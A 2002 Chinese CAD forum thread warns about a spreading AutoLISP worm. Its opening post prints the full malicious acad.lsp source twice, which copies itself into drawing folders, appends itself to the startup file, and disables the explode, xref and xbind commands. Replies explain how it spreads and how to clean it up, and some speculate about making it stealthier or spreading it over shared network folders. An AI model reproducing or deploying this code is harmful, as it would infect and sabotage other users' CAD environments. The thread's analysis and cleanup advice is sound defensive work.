[必看]：最近开始流行的一段恶意代码

秋枫 · 发表于 2002-8-15 23:37:23

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

您需要登录才可以下载或查看，没有账号？立即注册

×

具体表现为标准命令explode, xref, xbind不再有效。
每个编辑过dwg文件的目录下面都会有一个acad.lsp
很可恶。
我有好几个朋友都在问我为什么他炸不开图块了。跑去一看，
都是这个家伙。不知道谁干的。

我把代码整理一下，贴在下面：

[FONT=courier new]
(defun s::startup (/ old_cmd path dwgpath mnlpath
apppath oldacad newacad nowdwg lspbj
wjm wjm1 wjqm wjqm1 wz
ns1 ns2
)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path) 8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 ""
ns2 ""
)
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn (while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)
(if (= (substr ns1 8 7) "acadapp")
(setq lspbj 1)
)
)
(close wjm)
)
)
(if (and (= acadpath dwgpath) (/= acadpath path))
(progn (setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "acadapp.lsp"))
(if (= lspbj 0)
(progn (setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line
(strcat "(load " (chr 34) "acadapp" (chr 34) ")")
wjm
)
(write-line "(princ)" wjm)
(close wjm)
)
)
(writeapp)
)
(progn (if (/= nowdwg "Drawing.dwg")
(progn (setq oldacad (findfile "acadapp.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
)
)
)
)
(command "undefine" "explode")
(command "undefine" "xref")
(command "undefine" "xbind")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun writeapp ()
(if (setq wjm1 (open newacad "w"))
(progn (setq wjm (open oldacad "r"))
(while (setq wz (read-line wjm)) (write-line wz wjm1))
(close wjm)
(close wjm1)
)
)
)
(defun C:explode (/ p cont old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p (ssget))
(if p
(progn (setq cont (sslength p))
(princ "\nSeltct objects:")
(princ cont)
(princ " found")
(princ "\n")
(princ cont)
(princ " was not able to be explode")
)
)
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xref (/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xbind (/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:burst (/ p old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(princ "\nBURST----将图块中的文字炸开后成为实体")
(setq p (ssget))
(setvar "cmdecho" old_cmd)
(princ)
)
(princ)
[/FONT]

[FONT=courier new] 
(defun s::startup (/            old_cmd  path     dwgpath  mnlpath 
                   apppath  oldacad  newacad  nowdwg   lspbj 
                   wjm            wjm1     wjqm     wjqm1    wz 
                   ns1            ns2 
                  ) 
  (setq old_cmd (getvar "cmdecho")) 
  (setvar "cmdecho" 0) 
  (setq path (findfile "base.dcl")) 
  (setq path (substr path 1 (- (strlen path) 8))) 
  (setq mnlpath (getvar "menuname")) 
  (setq nowdwg (getvar "dwgname")) 
  (setq wjqm (findfile nowdwg)) 
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg)))) 
  (setq acadpath (findfile "acad.lsp")) 
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8))) 
  (setq        ns1 "" 
        ns2 "" 
  ) 
  (setq lspbj 0) 
  (setq wjqm (strcat path "acad.lsp")) 
  (if (setq wjm (open wjqm "r")) 
    (progn (while (setq wz (read-line wjm)) 
             (setq ns1 ns2) 
             (setq ns2 wz) 
           ) 
           (if (> (strlen ns1) 14) 
             (if (= (substr ns1 8 7) "acadapp") 
               (setq lspbj 1) 
             ) 
           ) 
           (close wjm) 
    ) 
  ) 
  (if (and (= acadpath dwgpath) (/= acadpath path)) 
    (progn (setq oldacad (findfile "acad.lsp")) 
           (setq newacad (strcat path "acadapp.lsp")) 
           (if (= lspbj 0) 
             (progn (setq wjqm (strcat path "acad.lsp")) 
                    (setq wjm (open wjqm "a")) 
                    (write-line 
                      (strcat "(load " (chr 34) "acadapp" (chr 34) ")") 
                      wjm 
                    ) 
                    (write-line "(princ)" wjm) 
                    (close wjm) 
             ) 
           ) 
           (writeapp) 
    ) 
    (progn (if (/= nowdwg "Drawing.dwg") 
             (progn (setq oldacad (findfile "acadapp.lsp")) 
                    (setq newacad (strcat dwgpath "acad.lsp")) 
                    (writeapp) 
             ) 
           ) 
    ) 
  ) 
  (command "undefine" "explode") 
  (command "undefine" "xref") 
  (command "undefine" "xbind") 
  (setvar "cmdecho" old_cmd) 
  (princ) 
) 
(defun writeapp        () 
  (if (setq wjm1 (open newacad "w")) 
    (progn (setq wjm (open oldacad "r")) 
           (while (setq wz (read-line wjm)) (write-line wz wjm1)) 
           (close wjm) 
           (close wjm1) 
    ) 
  ) 
) 
(defun C:explode (/ p cont old_cmd) 
  (setq old_cmd (getvar "cmdecho")) 
  (setvar "cmdecho" 0) 
  (setq p (ssget)) 
  (if p 
    (progn (setq cont (sslength p)) 
           (princ "\nSeltct objects:") 
           (princ cont) 
           (princ " found") 
           (princ "\n") 
           (princ cont) 
           (princ " was not able to be explode") 
    ) 
  ) 
  (setvar "cmdecho" old_cmd) 
  (princ) 
) 
(defun C:xref (/ old_cmd) 
  (setq old_cmd (getvar "cmdecho")) 
  (setvar "cmdecho" 0) 
  (command "insert") 
  (setvar "cmdecho" old_cmd) 
  (princ) 
) 
(defun C:xbind (/ old_cmd) 
  (setq old_cmd (getvar "cmdecho")) 
  (setvar "cmdecho" 0) 
  (command "insert") 
  (setvar "cmdecho" old_cmd) 
  (princ) 
) 
(defun C:burst (/ p old_cmd) 
  (setq old_cmd (getvar "cmdecho")) 
  (setvar "cmdecho" 0) 
  (princ "\nBURST----将图块中的文字炸开后成为实体") 
  (setq p (ssget)) 
  (setvar "cmdecho" old_cmd) 
  (princ) 
) 
(princ) 
[/FONT]

eachy · 发表于 2002-8-15 23:51:46

遇到以上情况时，用如下办法可以解决，在标准命令前加 .
如果能执行了，就要找以下文件了，acadrxx.lsp、acaddoc.lsp、以及mnl文件，还可能包括acad.rx，这些自动加载的文件。

允许应用程序定义的命令替代 AutoCAD 内部命令
命令行： undefine
输入命令名：
输入 AutoCAD 命令名将禁用该命令。可重新定义被禁用的命令名以执行其他功能。
只能取消 AutoCAD 内部命令的定义。不能取消由 AutoLISP® 定义的命令。这包括通过 acedDefun() 注册的
ObjectARX™ 应用程序命令。也不能取消在 acad.pgp 文件中定义的外部命令和别名的定义。
如果 AutoLISP 或 ObjectARX 应用程序定义的命令与 AutoCAD 内部命令同名，应用程序定义的命令将激活。
可以用REDEFINE 命令恢复被取消定义的命令。
在命令名前加句点 (.) 就可以访问 AutoCAD 内部命令。
对于通过 acedRegCmd 注册的 ObjectARX 应用程序命令，可在命令名前添加如下内容来访问它们：句号
(.)、命令组名、句号 (.)。例如，可以通过 .acad_mtext.mtext 来访问 MTEXT 命令。
要确定 ObjectARX 应用程序的命令名和编组，请使用ARX 命令，并选择“命令”选项查看所有当
前加载的 ObjectARX 命令及其组名的列表。

复制代码

无忧 · 发表于 2002-8-16 10:01:30

是的!这个东西是我在这里最早提出的，这个好象是病毒，现在我们单位里的电脑一台一台的被感染了。最早发现这样的是我的机器，凡是我的同事copy过我电脑里的DWG文件，立马感染上！

秋枫 · 发表于 2002-8-16 10:25:38

干脆提给杀毒软件公司吧。

zero · 发表于 2002-8-16 12:33:38

挺可怕的，哪位写个杀毒的lisp，呵呵

cy956 · 发表于 2002-8-16 13:04:11

最初由无忧发布
[B]是的!这个东西是我在这里最早提出的，这个好象是病毒，现在我们单位里的电脑一台一台的被感染了。最早发现这样的是我的机器，凡是我的同事copy过我电脑里的DWG文件，立马感染上！ [/B]

不算太恶意，不过非常无聊。
看程序好像和dwg无关，别是谁搞反应器了？

漏网の鱼 · 发表于 2002-8-16 13:34:13

从代码上看不到什么响应器, 但是如果代码被编译成fas就不太好收拾它了.

长清 · 发表于 2002-8-16 21:52:55

cad517 · 发表于 2002-8-17 17:06:28

最初由漏网之鱼发布
从代码上看不到什么响应器, 但是如果代码被编译成fas就不太好收拾它了.

同意你地观点

四季豆 · 发表于 2002-8-17 17:22:55

传播是很容易的。它会在每个dwg文件所在的文件夹中复制acad.lsp
有时候拷图是整个目录拷到另一台电脑上的，这样就会传染。
对dwg文件本身是不影响的。打开dwg文件，系统会首先执行dwg文件所在目录的acad.lsp

cy956 · 发表于 2002-8-17 17:28:26

这样的代码不可怕，应该不会象无忧所说一台一台传染。
可怕的是打在dwg中，如果是真的无忧所说的可能麻烦更大。

fylinwater · 发表于 2002-8-17 22:14:49

呵呵还好这事实上称不上是病毒但可以叫毒虫因为他看得见得
另外它也不是恶意得应该说是善意的或者是个警告！！而且缺乏潜伏性
如果因为它还没破坏你的其他文件，如果程序再伪装一点就危险了
比如第一次加载的时候不执行任何操作而是修改你的ACAD配置或者系统配置
等待一定时机再发作，那就快接近病毒了（除了隐蔽性差点）

fylinwater · 发表于 2002-8-17 22:19:11

想到一点假如这个程序再添加一点就是再网络里寻找完全共享文件夹往里面也添加代码，就真的很危险了那么在一个比较大的局域网里很可能危险的流行，而且“一台一台传染”

无忧 · 发表于 2002-8-18 21:29:09

TO cy956 : 确实是一台一台传染的，因为我是建筑专业的，其他专业的同事都要拷贝我的图，拷一个传染一个，他们都埋怨我，我只好告诉他们用"XP"炸块。

这里是我当时提出的话题，当时我可能把别的病毒产生的垃圾文件和这个ACAD.LSP混在一起谈了，请大家研究研究！
http://www.xdcad.net/forum/showt ... y=&pagenumber=1

cy956 · 发表于 2002-8-19 10:19:47

无忧，你拷给同事的图是r14的还是r2k的？拷的时候那个acad。lsp也捎上否？

你先用工具搜寻硬盘上所有acad。lsp，不在搜索路径的全部删掉，在搜索路径下
用的改好另存。另外，如果你用r2k，你可以抽空研究一下vlr－remove了。
不过挨上了也够倒霉，因为它可以用某个非cad文件引发，防不胜防。

上次看到有人在adesk讨论组发帖子说能反编译vlisp的编译程序，
后来好像说是中止了。技术上的能力没有止境，
谁都用自己掌握的一套显示威力，
会开飞机就能911，会寄信就可能寄炭疽，
会兑红药水就可以威胁打爱滋针。
这世界还不乱套？

不过，dwg相对安全的时代恐怕要过去了。

账号		自动登录	找回密码
密码			立即注册

[必看]：最近开始流行的一段恶意代码

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

相关帖子

[建议]:当CAD的标准命令失效时...

我觉得不会COPY就感染,关键是不要从别人的电脑上直接打开DWG文件.